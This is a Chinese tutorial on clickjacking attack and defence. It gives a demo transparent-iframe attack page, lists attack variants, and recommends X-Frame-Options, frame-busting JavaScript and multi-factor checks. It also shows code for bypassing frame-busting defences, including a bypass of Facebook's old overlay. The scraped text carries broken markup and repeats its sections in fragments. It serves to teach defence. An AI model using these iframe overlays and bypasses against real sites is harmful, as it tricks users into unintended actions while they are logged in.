Clickjacking攻防详解<\/h1>

0x00 概述<\/h2>
Clickjacking（点击劫持）是一种视觉欺骗攻击技术，攻击者通过透明iframe覆盖在网页上，诱使用户在不知情的情况下执行非预期操作。本文将从漏洞原理、威胁场景、防御方式到深入攻防进行全面讲解。<\/p>

0x01 漏洞简介<\/h2>

基本概念<\/h3>
点击劫持是一种视觉欺骗手段，攻击者使用透明\/不可见的iframe覆盖在网页上，诱使用户在目标网页上执行非预期操作。通过调整iframe位置，可诱导用户点击功能性按钮。<\/p>

攻击原理<\/h3>

攻击者创建恶意页面，包含透明iframe指向目标站点<\/li>
iframe覆盖在诱骗内容之上<\/li>
用户看似与诱骗内容交互，实际操作的是目标站点<\/li>

操作会携带用户的cookie等身份凭证<\/li> <\/ol>

实验演示<\/h3>

设置DNS解析：远程主机为example.com，本机为hacker.com<\/li>
远程主机运行HTTP服务，提供"文件下载"页面（模拟付款按钮）<\/li>

设置两种cookie：

resp.<\/span>set_cookie('session-cookie'<\/span>, '123'<\/span>)  # 会话cookie<\/span>
<\/span><\/span>resp.<\/span>set_cookie('third-part-cookie'<\/span>, '456'<\/span>, expires=<\/span>'Sun, 18-Mar-2019 10:05:05 GMT'<\/span>)  # 持久cookie<\/span>
<\/span><\/span><\/code><\/pre><\/li>
攻击页面代码：
<!DOCTYPE html><\/span>
<\/span><\/span><html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span>  <style<\/span>>
<\/span><\/span>    iframe<\/span> {
<\/span><\/span>      width<\/span>: 1440<\/span>px<\/span>; height<\/span>: 900<\/span>px<\/span>;
<\/span><\/span>      position<\/span>: absolute<\/span>; top<\/span>: -0<\/span>px<\/span>; left<\/span>: -0<\/span>px<\/span>;
<\/span><\/span>      z-index<\/span>: 2<\/span>; opacity<\/span>: 0.2<\/span>;
<\/span><\/span>    }
<\/span><\/span>    button<\/span> {
<\/span><\/span>      position<\/span>: absolute<\/span>; top<\/span>: 100<\/span>px<\/span>; left<\/span>: 50<\/span>px<\/span>;
<\/span><\/span>      z-index<\/span>: 1<\/span>; width<\/span>: 120<\/span>px<\/span>;
<\/span><\/span>    }
<\/span><\/span>  <\/style<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span>  <iframe<\/span> src<\/span>=<\/span>"http:\/\/www.example.com"<\/span> scrolling<\/span>=<\/span>"no"<\/span>><\/iframe<\/span>>
<\/span><\/span>  <button<\/span>>Click Here!<\/button<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
用户点击看似无害的按钮，实际触发了目标站点的操作<\/li>
<\/ol>
0x02 威胁场景<\/h2>
常见攻击变种<\/h3>

登录态劫持<\/strong>：诱导已登录用户执行敏感操作<\/li>
复杂操作诱导<\/strong>：通过Flash游戏等方式改变点击位置<\/li>
表单填写攻击<\/strong>：诱导用户填写并提交表单<\/li>
图片覆盖攻击(XSIO)<\/strong>：覆盖原站点图片诱导点击钓鱼链接<\/li>
拖拽劫持<\/strong>：利用浏览器拖拽API窃取数据

不受同源策略限制<\/li>
可窃取链接、文字等内容<\/li>
<\/ul>
<\/li>
移动端攻击<\/strong>：劫持触屏操作，利用隐藏地址栏特性<\/li>
<\/ol>
0x03 防御方式<\/h2>
1. X-Frame-Options HTTP头<\/h3>
推荐程度：★★★★★<\/p>
X-Frame-Options: DENY  # 完全禁止嵌套
<\/span><\/span><\/span>X-Frame-Options: SAMEORIGIN  # 仅允许同源嵌套
<\/span><\/span><\/span>X-Frame-Options: ALLOW-FROM uri  # 允许指定源嵌套（Chrome不支持）
<\/span><\/span><\/span><\/code><\/pre>2. JavaScript防御<\/h3>
推荐代码（目前无已知绕过方式）：<\/p>
<style<\/span>>body<\/span> {display<\/span>: none<\/span>;}<\/style<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>if<\/span> (self<\/span> ==<\/span> top<\/span>) {
<\/span><\/span>  document.body<\/span>.style<\/span>.display<\/span> =<\/span> 'block'<\/span>;
<\/span><\/span>} else<\/span> {
<\/span><\/span>  top<\/span>.location<\/span> =<\/span> self<\/span>.location<\/span>;
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>不推荐代码（可被绕过）：<\/p>
if<\/span> (top<\/span>.location<\/span> !=<\/span> location<\/span>) {
<\/span><\/span>  top<\/span>.location<\/span> =<\/span> self<\/span>.location<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 多因素认证<\/h3>
重要操作前要求：<\/p>

二次密码验证<\/li>
隐私问题回答<\/li>
其他验证方式<\/li>
<\/ul>
4. 其他方式<\/h3>

CSP策略（FireFox支持，不推荐单独使用）<\/li>
避免使用iframe（如无必要）<\/li>
<\/ul>
0x04 深入攻防<\/h2>
JS防御绕过方式<\/h3>
1. JS接口hook<\/h4>
方法一：onBeforeUnload事件<\/strong><\/p>
<script<\/span>>
<\/span><\/span>window.onbeforeunload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>  return<\/span> "浏览5分钟有红包"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><iframe<\/span> src<\/span>=<\/span>"http:\/\/www.example.com"<\/span>>
<\/span><\/span><\/code><\/pre>IE有效，Chrome已修复<\/em><\/p>
方法二：重写top.location<\/strong><\/p>
<script<\/span>>var<\/span> location<\/span> =<\/span> "clobbered"<\/span>;<\/script<\/span>>
<\/span><\/span><!-- 或 --><\/span>
<\/span><\/span><script<\/span>>window.__defineSetter__<\/span>("location"<\/span>, function<\/span>(){})<\/script<\/span>>
<\/span><\/span><iframe<\/span> src<\/span>=<\/span>"http:\/\/www.victim.com"<\/span>><\/iframe<\/span>>
<\/span><\/span><\/code><\/pre>部分Safari有效<\/em><\/p>
2. 检查代码绕过<\/h4>
方法一：双重框架<\/strong><\/p>
Attacker top frame:
<iframe src='hacker.com'><\/iframe>

Attacker sub-frame: 
<iframe src='example.com'><\/iframe>
<\/code><\/pre>
依赖浏览器parent对象处理<\/em><\/p>
方法二：referrer检查绕过<\/strong>

利用正则匹配不严谨<\/em><\/p>
方法三：top.location检查绕过<\/strong>

利用filter函数匹配规则不完善<\/em><\/p>
方法四：移动端疏漏<\/strong>

主站防护但移动版未防护<\/em><\/p>
3. 浏览器特性利用<\/h4>

XSS过滤器干扰JS执行<\/li>
OnBeforeUnload-204冲刷<\/li>
iframe的security='restricted'<\/code>(IE)或sandbox<\/code>(Chrome)属性<\/li>
document.designMode<\/code>启用(IE\/FireFox)<\/li>
<\/ul>
4. 禁用JS<\/h4>
通过浏览器设置或插件禁用JS<\/em><\/p>
Facebook防御案例<\/h3>
原始防御代码<\/strong>：<\/p>
if<\/span> (top<\/span> !=<\/span> self<\/span>) {
<\/span><\/span>  window.document.write<\/span>("<div style='background: black; opacity: 0.5; position: absolute; top: 0px; left: 0px; width: 9999px; height: 9999px; z-index: 1000001' onClick='top.location.href=window.location.href'><\/div>"<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方式<\/strong>：<\/p>
<body<\/span> style<\/span>=<\/span>"overflow-x: hidden; border: 0px; margin: 0px;"<\/span>>
<\/span><\/span>  <iframe<\/span> width<\/span>=<\/span>"21800px"<\/span> height<\/span>=<\/span>"2500px"<\/span> src<\/span>=<\/span>"http:\/\/facebook.com\/"<\/span>><\/iframe<\/span>>
<\/span><\/span>  <script<\/span>>window.scrollTo<\/span>(10200<\/span>, 0<\/span>);<\/script<\/span>>
<\/span><\/span><\/code><\/pre>通过超大iframe和滚动避开遮挡层<\/em><\/p>
0x05 最佳实践建议<\/h2>


优先使用X-Frame-Options头部<\/strong><\/p>

重要页面部署DENY<\/code>或SAMEORIGIN<\/code><\/li>
注意代理可能修改头部<\/li>
<\/ul>
<\/li>

JS防御作为补充<\/strong><\/p>

使用推荐的无绕过方案<\/li>
考虑JS禁用时的后备显示<\/li>
<\/ul>
<\/li>

关键操作多因素认证<\/strong><\/p>

支付、敏感设置等操作增加验证<\/li>
<\/ul>
<\/li>

全面测试防御效果<\/strong><\/p>

测试各种绕过可能性<\/li>
业务与安全团队协作确定方案<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 参考资料<\/h2>

《白帽子讲Web安全》<\/li>
斯坦福大学论文《Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites》<\/li>
<\/ol>

Clickjacking攻防详解<\/h1>

0x00 概述<\/h2> Clickjacking（点击劫持）是一种视觉欺骗攻击技术，攻击者通过透明iframe覆盖在网页上，诱使用户在不知情的情况下执行非预期操作。本文将从漏洞原理、威胁场景、防御方式到深入攻防进行全面讲解。<\/p>

0x01 漏洞简介<\/h2>

基本概念<\/h3> 点击劫持是一种视觉欺骗手段，攻击者使用透明\/不可见的iframe覆盖在网页上，诱使用户在目标网页上执行非预期操作。通过调整iframe位置，可诱导用户点击功能性按钮。<\/p>

0x02 威胁场景<\/h2>

0x03 防御方式<\/h2>

0x04 深入攻防<\/h2>

JS防御绕过方式<\/h3>

4. 禁用JS<\/h4> 通过浏览器设置或插件禁用JS<\/em><\/p>

0x06 参考资料<\/h2> 《白帽子讲Web安全》<\/li> 斯坦福大学论文《Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites》<\/li> <\/ol>

0x00 概述<\/h2>
Clickjacking（点击劫持）是一种视觉欺骗攻击技术，攻击者通过透明iframe覆盖在网页上，诱使用户在不知情的情况下执行非预期操作。本文将从漏洞原理、威胁场景、防御方式到深入攻防进行全面讲解。<\/p>

基本概念<\/h3>
点击劫持是一种视觉欺骗手段，攻击者使用透明\/不可见的iframe覆盖在网页上，诱使用户在目标网页上执行非预期操作。通过调整iframe位置，可诱导用户点击功能性按钮。<\/p>

4. 禁用JS<\/h4>
通过浏览器设置或插件禁用JS<\/em><\/p>

0x06 参考资料<\/h2>

《白帽子讲Web安全》<\/li>
斯坦福大学论文《Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites》<\/li> <\/ol>